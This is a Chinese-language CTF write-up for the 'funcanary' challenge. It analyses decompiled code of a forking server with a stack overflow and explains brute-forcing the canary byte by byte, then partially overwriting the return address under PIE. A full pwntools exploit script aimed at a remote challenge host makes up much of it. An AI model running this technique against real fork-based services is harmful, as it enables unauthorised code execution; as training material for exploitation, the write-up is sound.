ciscn_funcanary
保护检查

源码分析
/*
 * Decompiled entry point (Hex-Rays pseudocode, original symbol names kept).
 *
 * Serves forever: one fork()ed child per round. The child prints "welcome",
 * runs the vulnerable reader sub_128A() and prints "have fun"; the parent only
 * wait()s for it and then forks again.
 *
 * Why this matters for the exploit (everything stated here is visible below):
 *  - every child is fork()ed from the same parent, so it inherits an identical
 *    copy of the parent's memory, stack canary included;
 *  - a child killed by a canary mismatch does not stop the service: the parent
 *    returns from wait() and forks a fresh child, which is what allows the
 *    byte-by-byte canary brute force;
 *  - the child does not exit after "have fun" but goes back to the loop and
 *    starts forking its own children;
 *  - the only exit from the loop is fork() failing, followed by exit(0).
 *
 * sub_1243(): setup routine run once before the loop; its body is not shown
 * on this page.
 */
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  __pid_t child; // [rsp+Ch] [rbp-4h]

  sub_1243(a1, a2, a3);
  for ( ;; )
  {
    child = fork();
    if ( child < 0 )
      break;                      /* fork failed: leave the loop, report, exit */
    if ( child == 0 )
    {
      /* child: one service round, then back to the top of the loop */
      puts("welcome");
      sub_128A();
      puts("have fun");
      continue;
    }
    wait(0LL);                    /* parent: reap the child, then serve again */
  }
  puts("fork error");
  exit(0);
}
/*
 * Decompiled vulnerable reader (Hex-Rays pseudocode, kept byte-for-byte).
 *
 * Reads up to 0x80 (128) bytes from stdin into a 104-byte stack buffer and
 * returns the difference between the saved canary and the live one (0 when the
 * canary is intact).
 *
 * Stack layout, from the decompiler's own offset annotations:
 *   buf : rbp-0x70 .. rbp-0x09   (104 bytes)
 *   v2  : rbp-0x08               (copy of the canary read from fs:0x28)
 * The canary therefore sits immediately after buf, followed by the saved rbp
 * and the return address. A full 0x80-byte read() overflows buf by 24 bytes:
 *   8 (canary) + 8 (saved rbp) + 8 (return address; the exploit on this page
 *   only overwrites its two low bytes).
 *
 * NOTE(review): the `v2 - fs:0x28` subtraction is how the decompiler renders
 * the canary check; a non-zero result presumably ends in __stack_chk_fail
 * (abort of the child), the call itself is not visible in this pseudocode.
 * The return value of read() is ignored, so a short read is not noticed.
 */
unsigned __int64 sub_128A()
{
  char buf[104]; // [rsp+0h] [rbp-70h] BYREF
  unsigned __int64 v2; // [rsp+68h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  read(0, buf, 0x80uLL);  /* 0x80 > sizeof(buf) == 104: stack overflow */
  return v2 - __readfsqword(0x28u);
}
sub_128A 向 104 字节的 buf 读入 0x80 (128) 字节，存在栈溢出，但二进制开启了 canary。由于每个子进程都是由同一个父进程 fork 出来的，内存布局和 canary 完全相同；canary 猜错只会让当前子进程崩溃，父进程 wait 之后继续 fork，因此可以逐字节爆破 canary（glibc 的 canary 最低字节固定为 \x00，只需爆破剩余 7 字节，每字节最多 256 次）。拿到 canary 后覆盖返回地址的低 2 字节，跳转到偏移 0x1231 处：PIE 下地址的低 12 位（0x231）固定不变，只剩 1 个 nibble 未知，最多再试 16 次。
就是劫持到如下代码处

最开始我用的是 0x1229 那个地址，但是一直出错，不清楚是哪里出了问题。（我猜测是前面的压栈操作使程序调用 system 函数时栈没有按 16 字节对齐：从 0x1229 进入会比从 0x1231 进入多执行一段指令，如果其中含有 push 而没有对应的 rsp 调整，进入 system 时 rsp 就会偏移 8 字节；glibc 的 system 内部通常会执行要求 16 字节对齐的 movaps 指令，不对齐时直接 SIGSEGV。这一点需要结合反汇编确认。）
exp
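from pwn import *

context(os='linux', arch='amd64', log_level='debug')

# p = process("./funcanary")
p = remote('39.105.26.155', 28813)

# Stack layout of sub_128A, taken from the decompiler annotations:
#   buf        104 bytes at rbp-0x70
#   canary       8 bytes at rbp-0x08   (directly above buf)
#   saved rbp    8 bytes
#   return address
# read(0, buf, 0x80) therefore writes 24 bytes past buf: the canary, the saved
# rbp and the return address (of which we only touch the two low bytes).
BUF_LEN = 104
# Offset (relative to the PIE base) of the code we want to return into.
TARGET_OFF = 0x1231

# Every payload is built from bytes: pwntools on Python 3 does not accept str
# for send(), and chr(i) for i >= 0x80 would be UTF-8 encoded into two bytes.
# p8()/p16()/enhex() come from pwntools and behave the same on Python 2 and 3.


def guess_canary(io):
    """Brute-force the 7 unknown canary bytes, one byte at a time.

    glibc canaries have a NUL low byte, so that one is known. Every child is
    fork()ed from the same parent and inherits its canary: a wrong byte only
    aborts that child (the parent loops and prints "welcome" again), a right
    byte lets sub_128A return normally and the child prints "have fun".

    Returns the full 8-byte canary. Aborts via log.error() if none of the 256
    candidates for a byte matches, instead of silently continuing with a
    truncated canary as the original loop did.
    """
    canary = b'\x00'
    for _ in range(7):
        for guess in range(0x100):
            io.send(b'a' * BUF_LEN + canary + p8(guess))
            reply = io.recvuntil(b"welcome\n")
            if b'fun' in reply:
                canary += p8(guess)
                break
        else:
            log.error("no canary byte matched in 256 attempts")
    return canary


def hijack_return(io, canary):
    """Overwrite the two low bytes of the return address with TARGET_OFF.

    Under PIE only the low 12 bits of a code address are fixed (0x231 here);
    the nibble above them is unknown, so 16 attempts cover every possibility.
    A wrong nibble just crashes that child and the parent keeps serving.
    """
    for nibble in range(16):
        ret_lo = (TARGET_OFF & 0xfff) | (nibble << 12)
        io.send(b'a' * BUF_LEN + canary + b'a' * 8 + p16(ret_lo))
        # Drain whatever the child printed. The timeout keeps the loop from
        # blocking forever once the successful attempt hands us a shell that
        # prints nothing in response to the remaining garbage payloads.
        io.recv(timeout=1)


p.recvuntil(b"welcome\n")
canary = guess_canary(p)
log.info("canary bytes = " + enhex(canary))
hijack_return(p, canary)
p.interactive()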